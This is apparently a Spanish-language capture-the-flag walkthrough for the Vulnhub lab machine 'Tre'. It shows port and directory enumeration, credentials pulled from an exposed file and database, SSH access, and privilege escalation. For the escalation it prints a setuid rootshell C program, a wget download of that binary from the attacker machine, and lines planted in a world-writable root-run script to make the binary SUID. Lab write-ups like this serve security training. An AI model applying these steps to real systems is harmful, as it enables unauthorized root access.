[VLN] Tre

Hoy vamos a hackear la maquina de Vulnhub llamada Tre. Podeis descargarla desde el siguiente enlace: Tre

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@m0nique:~$ nmap -A -p- 192.168.112.130
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-18 12:40 CEST
Nmap scan report for 192.168.112.130
Host is up (0.0010s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 99:1a:ea:d7:d7:b3:48:80:9f:88:82:2a:14:eb:5f:0e (RSA)
|   256 f4:f6:9c:db:cf:d4:df:6a:91:0a:81:05:de:fa:8d:f8 (ECDSA)
|_  256 ed:b9:a9:d7:2d:00:f8:1b:d3:99:d6:02:e5:ad:17:9f (ED25519)
80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Tre
8082/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Tre
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.16 seconds
Echamos un vistazo al Apache... (puerto 80)

sml@m0nique:~$ gobuster dir -u http://192.168.112.130 -w 
/usr/share/wordlists/dirb/big.txt -x php,html,htm,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.112.130
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,htm,txt
[+] Timeout:        10s
===============================================================
2020/05/18 12:42:09 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.htm (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.htm (Status: 403)
/.htaccess.txt (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/adminer.php (Status: 200)
/cms (Status: 301)
/index.html (Status: 200)
/info.php (Status: 200)
/mantisbt (Status: 301)
/server-status (Status: 403)
/system (Status: 401)
===============================================================
2020/05/18 12:42:19 Finished
===============================================================
Vemos la carpeta /mantisbt, asi que vamos a indagar un poco mas...

sml@m0nique:~$ gobuster dir -u http://192.168.112.130/mantisbt/ -w 
/usr/share/wordlists/dirb/big.txt -x php,html,htm,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.112.130/mantisbt/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,htm,txt
[+] Timeout:        10s
===============================================================
2020/05/18 12:47:24 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.htm (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.htm (Status: 403)
/.htaccess.txt (Status: 403)
/admin (Status: 301)
/api (Status: 301)
/bug_report.php (Status: 200)
/config (Status: 301)
/css (Status: 301)
/core (Status: 301)
/core.php (Status: 200)
/doc (Status: 301)
/file_download.php (Status: 302)
/fonts (Status: 301)
/images (Status: 301)
/index.php (Status: 302)
/js (Status: 301)
/lang (Status: 301)
/library (Status: 301)
/login.php (Status: 302)
/main_page.php (Status: 302)
/plugins (Status: 301)
/plugin.php (Status: 200)
/scripts (Status: 301)
/search.php (Status: 302)
/signup.php (Status: 200)
/vendor (Status: 301)
/view.php (Status: 200)
/verify.php (Status: 200)
/wiki.php (Status: 200)
===============================================================
2020/05/18 12:47:35 Finished
===============================================================
En http://192.168.112.130/mantisbt/config/a.txt podemos encontrar unos credenciales que podemos utilizar en http://192.168.112.130/adminer.php. Nos logueamos en "adminer.php" con los credenciales y vamos a "select mantis_user_table", despus a "select data". Ahi encontraremos usuarios/passwords.

Low Shell


Probamos a conectar por ssh con el usuario tre y el password que hemos encontrado (Tr3@123456A!).

sml@m0nique:~$ ssh tre@192.168.112.130
tre@192.168.112.130's password: 
Linux tre 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 18 14:39:58 2020 from 192.168.112.128
tre@tre:~$
Estamos dentro :) Miramos si tenemos algo especial, que podamos ejecutar con sudo.

tre@tre:/tmp$ sudo -l
Matching Defaults entries for tre on tre:
    env_reset, mail_badpass, 
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tre may run the following commands on tre:
    (ALL) NOPASSWD: /sbin/shutdown
Podemos ejecutar shutdown.... Por otro lado, mirando los procesos, vemos que hay uno que llama la atencion.

tre@tre:~$ ps aux | grep check
root        391  0.0  0.1   6728  3288 ?        Ss   06:38   0:02 /bin/bash 
/usr/bin/check-system
tre       35106  0.0  0.0   6208   892 pts/1    S+   08:03   0:00 grep check
tre@tre:~$ ls -l /usr/bin/check-system
-rw----rw- 1 root root 135 May 12 04:08 /usr/bin/check-system
Al parecer /bin/bash /usr/bin/check-system se ejecuta como root, y tenemos permisos de lectura/escritura sobre el. Echamos un vistazo al fichero:

tre@tre:~$ cat /usr/bin/check-system
DATE=`date '+%Y-%m-%d %H:%M:%S'`
echo "Service started at ${DATE}" | systemd-cat -p info

while :
do
echo "Checking...";
sleep 1;
done
Vemos que es un script sencillito.

Privilege Escalation


Sabiendo esto, en nuestra maquina vamos a compilar una rootshell, que luego nos descargaremos en la maquina victima. El codigo de la rootshell es el siguiente:

sml@m0nique:/var/www/html$ cat rootshell.c
// gcc -o /tmp/rootshell /tmp/rootshell.c
// chmod u+s /tmp/rootshell

#include 
#include 
#include 
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}
La compilamos:

root@m0nique:/var/www/html# gcc -o rootshell rootshell.c
Arrancamos el servidor web para hacer accesible el binario "rootshell" y nos lo descargamos en la maquina "victima", en este caso en /home/tre/rootshell.

tre@tre:~$ wget http://192.168.112.128/rootshell
--2020-05-18 14:38:37--  http://192.168.112.128/rootshell
Connecting to 192.168.112.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16712 (16K) [application/octet-stream]
Saving to: ‘rootshell’

rootshell                                 
100%[=======================>]  16.32K  --.-KB/s    in 0s      

2020-05-18 14:38:37 (422 MB/s) - ‘rootshell’ saved [16712/16712]
Editamos el fichero "/usr/bin/check-system", y agregamos las lineas necesarias para que rootshell tenga SUID, su propietario sea root y pueda ser ejecutado por "tre", de ese modo al ejecutarlo pasaremos a ser root...

tre@tre:~$ nano /usr/bin/check-system
Quedaria asi:

tre@tre:~$ cat /usr/bin/check-system

DATE=`date '+%Y-%m-%d %H:%M:%S'`
echo "Service started at ${DATE}" | systemd-cat -p info
chown root:tre /home/tre/rootshell
chmod +x /home/tre/rootshell
chmod +s /home/tre/rootshell
while :
do
echo "Checking...";
sleep 1;
done
Reiniciamos la maquina para que se ejecute /usr/bin/check-system con los cambios que hemos realizado.

tre@tre:~$ sudo shutdown -r now
Volvemos a conectar, y comprobamos:

sml@m0nique:~$ ssh tre@192.168.112.130
tre@192.168.112.130's password:                                                   
Linux tre 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64            
The programs included with the Debian GNU/Linux system are free software;          
the exact distribution terms for each program are described in the                
individual files in /usr/share/doc/*/copyright.                                 
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent               
permitted by applicable law.                                                                                                                                      
Last login: Mon May 18 14:36:31 2020 from 192.168.112.128                         
tre@tre:~$ ls -l
total 20
-rwsr-sr-x 1 root tre  16712 May 18 14:38 rootshell
Vemos que esta tal y como lo necesitabamos asi que...

tre@tre:~$ ./rootshell 
root@tre:~# id
uid=0(root) gid=0(root) 
groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(
netdev),1000(tre)
root@tre:~# whoami
root
root@tre:~# hostname
tre

root.txt



root@tre:~# cd /root
root@tre:/root# ls
root.txt
root@tre:/root# cat root.txt 
{SunCSR_Tr3_Viet_Nam_2020}
root@tre:/root#

End


Y con esto ya seriamos root de la maquina :)